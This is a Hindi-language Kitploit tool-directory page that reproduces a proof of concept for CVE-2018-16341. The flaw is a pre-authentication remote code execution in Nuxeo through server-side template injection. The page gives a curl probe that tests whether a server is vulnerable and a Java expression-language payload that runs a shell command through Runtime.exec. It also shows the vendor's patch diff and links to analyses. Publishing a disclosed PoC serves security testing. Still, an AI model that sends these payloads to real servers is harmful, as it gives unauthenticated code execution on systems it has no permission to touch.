Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2018-16341 — CVE-2018-16341 - Nuxeo Remote Code Execution without authentication using Server Side Template Injection | Kitploit
उपकरण/GitHubGitHub/mpgn/cve-2018-16341
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubmpgn/cve-2018-16341

CVE-2018-16341

CVE-2018-16341 - Nuxeo Remote Code Execution without authentication using Server Side Template Injection

रिपॉजिटरी देखें
24127 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2018-16341

Nuxeo प्रमाणीकरण बायपास रिमोट कोड निष्पादन < 10.3 SSTI का उपयोग करके - CVE-2018-16341

image

विस्तृत विश्लेषण (अंग्रेजी नहीं):

  • https://www.freebuf.com/vuls/193000.html
  • https://blog.riskivy.com/nuxeo-rce-analysis-cve-2018-16341/

सुरक्षा सलाह:

  • https://github.com/nuxeo/nuxeo/commit/eb54a9145c6d8297eba9d7dafc74556e735fa388#diff-cf2094833ef0eea473d03bf6559f1798R97

नोट: Nuxeo 9.x का संस्करण अब Nuxeo द्वारा समर्थित नहीं है लेकिन संस्करण 9.x के लिए एक हॉटफिक्स प्रदान किया गया है। मेरी तरफ से, संस्करण 9.10 असुरक्षित था।


भेद्यता

यह PoC सर्वर साइड टेम्पलेट इंजेक्शन (SSTI) का शोषण करके NuxeoUnknownResource.java फ़ाइल में स्थित RCE प्राप्त करता है।

  • यह जांचने के लिए कि Nuxeo असुरक्षित है या नहीं, बस इस पेलोड को भेजें और संख्या 49 की जांच करें:
root@kitploit:~
curl http://127.0.0.1:8080/nuxeo/login.jsp/pwn${-7+7}.xhtml"
  • इस पेलोड का उपयोग करके RCE प्राप्त करें:
root@kitploit:~
${"".getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("touch /tmp/pwn.txt",null).waitFor()}

सुधार

root@kitploit:~
@@ -94,8 +92,13 @@ public void connect() throws IOException {
 
             @Override
             public InputStream getInputStream() throws IOException {
+                String message = "ERROR: facelet not found";
+                // NXP-25746
+                if (Framework.isDevModeSet() && !path.contains("$") && !path.contains("#")) {
+                    message += " at '" + path + "'";
+                }
                 String msg = "<span><span style=\"color:red;font-weight:bold;\">"
-                        + StringEscapeUtils.escapeHtml4(errorMessage) + "</span><br/></span>";
+                        + StringEscapeUtils.escapeHtml4(message) + "</span><br/></span>";
                 return new ByteArrayInputStream(msg.getBytes());
             }
         }
टूल डाउनलोड करें